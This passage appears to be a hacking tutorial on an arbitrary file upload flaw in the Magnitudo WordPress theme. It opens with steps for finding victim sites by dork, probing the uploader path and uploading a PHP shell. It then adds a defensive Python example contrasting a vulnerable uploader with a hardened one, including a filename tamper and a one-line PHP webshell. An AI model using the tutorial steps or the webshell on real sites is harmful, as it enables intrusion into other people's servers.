$uploadfile="shell.php"; becomes your shell's file name, so for x.php make it x.php as well :))

OK, let's get going. First, find a target with the GOOGLE DORK above

e.g. http://www.site.com/

Then append the exploit path
/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php

If you see an "Error Files Upload" message, it is vulnerable.

Put that full URL into the exploit as the address the upload is posted to,

then open CMD

and type cd xampp, Enter >> cd php, Enter, and run the script with php (php yourexploit.php).

If it succeeds, the file will be here:



http://site.com/wordpress/wp-content/uploads/2013/10/x.php

That is all for the Magnitudo theme Arbitrary File Upload Vulnerability tutorial. I hope it is useful :)
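All four uploader posts on this page (OptimizePress media-upload.php, the /banner/pasang ad form, the WP-Store upload directory and the Magnitudo valums uploader) come down to two mistakes: the upload script is reachable without logging in, and the file is stored under the name the client supplied after, at most, a browser-side extension check. The following is an added example, not code from any of those themes or from the post: it builds the multipart request a browser would send, applies the shell.php.jpg to shell.php tamper from the ad-site post, and shows a vulnerable store beside a hardened one (login and capability check, form nonce, extension allowlist, magic-byte check, server-chosen file name). The field names, the session shape and the in-memory uploads dict are assumptions.

```python
"""Upload handling, weak and hardened (added example; not code from any theme or from the post)."""
import re
import secrets

BOUNDARY = b"----FormBoundaryEXAMPLE"            # constructed; a browser picks a random one


def build_multipart(field, filename, content, boundary=BOUNDARY):
    """Single-file multipart/form-data body as a browser would send it."""
    return (b"--" + boundary + b"\r\n"
            b'Content-Disposition: form-data; name="' + field.encode() + b'"; filename="'
            + filename.encode() + b'"\r\n'
            b"Content-Type: application/octet-stream\r\n\r\n" + content + b"\r\n"
            b"--" + boundary + b"--\r\n")


def tamper(body, old_name, new_name):
    """What Live HTTP Headers / Tamper Data let you do: edit the request after the browser's checks ran."""
    return body.replace(f'filename="{old_name}"'.encode(), f'filename="{new_name}"'.encode())


def parse_multipart(body, boundary=BOUNDARY):
    """(field, filename, content) of the first file part. filename is client data, nothing more."""
    part = body.split(b"--" + boundary + b"\r\n", 1)[1].split(b"\r\n--" + boundary, 1)[0]
    headers, content = part.split(b"\r\n\r\n", 1)
    m = re.search(rb'name="([^"]*)"; filename="([^"]*)"', headers)
    return m.group(1).decode(), m.group(2).decode(), content


def vulnerable_store(body, uploads):
    """The pattern behind the uploaders on this page: no login check, file saved under the client's
    name. `uploads` is a dict standing in for the uploads directory."""
    _, filename, content = parse_multipart(body)
    uploads[filename] = content
    return filename


ALLOWED_TYPES = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}  # ext -> magic


class UploadRejected(Exception):
    pass


def hardened_store(body, uploads, session, nonce):
    # 1. Not reachable anonymously, and only for users allowed to upload (WordPress: upload_files cap).
    if not session.get("user") or "upload_files" not in session.get("caps", ()):
        raise UploadRejected("not authorised")
    # 2. Form token bound to the session, so a logged-in victim cannot be made to upload for you.
    if not secrets.compare_digest(nonce, session.get("nonce", "")):
        raise UploadRejected("bad nonce")
    _, filename, content = parse_multipart(body)
    # 3. Allowlist on the LAST extension only; shell.php, shell.phtml and shell.pHp all fail here.
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        raise UploadRejected(f"extension not allowed: {filename!r}")
    # 4. Content has to look like the claimed type; shell.php.jpg passes step 3 and dies here.
    if not content.startswith(magic):
        raise UploadRejected("content does not match extension")
    # 5. The server picks the stored name; the client's name never touches the filesystem.
    stored = f"{secrets.token_hex(16)}.{ext}"
    uploads[stored] = content
    return stored


def is_rejected(store, *args):
    """True if `store` refuses the upload."""
    try:
        store(*args)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    php = b"<?php system($_GET['c']); ?>"                      # constructed stand-in for a shell
    body = tamper(build_multipart("userfile", "shell.php.jpg", php), "shell.php.jpg", "shell.php")
    print("vulnerable uploader stored it as:", vulnerable_store(body, {}))
    editor = {"user": "editor", "caps": {"upload_files"}, "nonce": "n0nce"}
    print("hardened uploader rejects it:", is_rejected(hardened_store, body, {}, editor, "n0nce"))
```

The magic-byte check is defence in depth only: a file can be a valid JPEG and still contain PHP. What actually stops execution is that the stored name never carries the attacker's extension, and that the uploads directory is served without script execution.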
